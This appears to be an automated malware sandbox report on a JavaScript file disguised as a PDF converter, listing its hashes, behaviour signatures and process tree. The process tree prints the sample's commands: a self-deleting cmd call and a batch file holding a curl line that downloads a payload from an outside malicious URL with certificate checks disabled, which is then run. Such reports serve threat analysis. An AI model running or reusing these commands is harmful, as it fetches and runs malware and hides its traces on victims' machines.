Analysis
-
max time kernel
122s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
14/10/2023, 10:49
Static task
static1
Behavioral task
behavioral1
Sample
convert-pdf-691.js
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
convert-pdf-691.js
Resource
win10v2004-20230915-en
General
-
Target
convert-pdf-691.js
-
Size
44KB
-
MD5
baab807d9799ba81b6cf672d75af688a
-
SHA1
5a6ebb01034e9ab3b719db948db259fe2fa2e84f
-
SHA256
ac99aa6b0162d71f33b1e9b286e9d0ed899ab449ac29040e494c4fb4b9b87d4d
-
SHA512
b06019d06c4945bf62ab2a8116b495d19e3fd95693550a66fa9304b3e193c04b3a4ed4e5b29123e42ab2aff4074f52d10709de5890ec1497c295dfc71e109c57
-
SSDEEP
384:/2eY5d0Bp7w2l/uYvxsDxb9Q5tbauRFvSefk1EK4s0QDQZWifIPguWYvLETAMg61:uTC3l2yDSef6EMveZgP8UJq58z293l
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 3064 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2808 wrote to memory of 3064 2808 wscript.exe 29 PID 2808 wrote to memory of 3064 2808 wscript.exe 29 PID 2808 wrote to memory of 3064 2808 wscript.exe 29 PID 2808 wrote to memory of 2924 2808 wscript.exe 30 PID 2808 wrote to memory of 2924 2808 wscript.exe 30 PID 2808 wrote to memory of 2924 2808 wscript.exe 30 PID 2808 wrote to memory of 2380 2808 wscript.exe 33 PID 2808 wrote to memory of 2380 2808 wscript.exe 33 PID 2808 wrote to memory of 2380 2808 wscript.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\convert-pdf-691.js1⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\convert-pdf-691.js"2⤵
- Deletes itself
PID:3064
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo curl https://getdebtgo.com/wp-content/plugins/bluehost-wordpress-plugin/vendor/wpscholar/url/6006.7z --output "C:\Users\Admin\AppData\Local\Temp\voluptatum.h" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\esse.i.bat"2⤵PID:2924
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\esse.i.bat"2⤵PID:2380
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
199B
MD52f4003de23fc616ebd1ca0e3730f9313
SHA185fe457b0a486c254f84a61a0b1a1375018320e3
SHA256220f6a2e691cd7f6ee1be619d45cb4ecebca6f59179ef9339a61ee2ddd40a48b
SHA5120131d0800aeef2a395d10daa8267496655ec03e3fdbf1ec0939fd99b914855275f6081b67faecb241f22c274238219934ba1f17e19066975dda0c6e698bede0e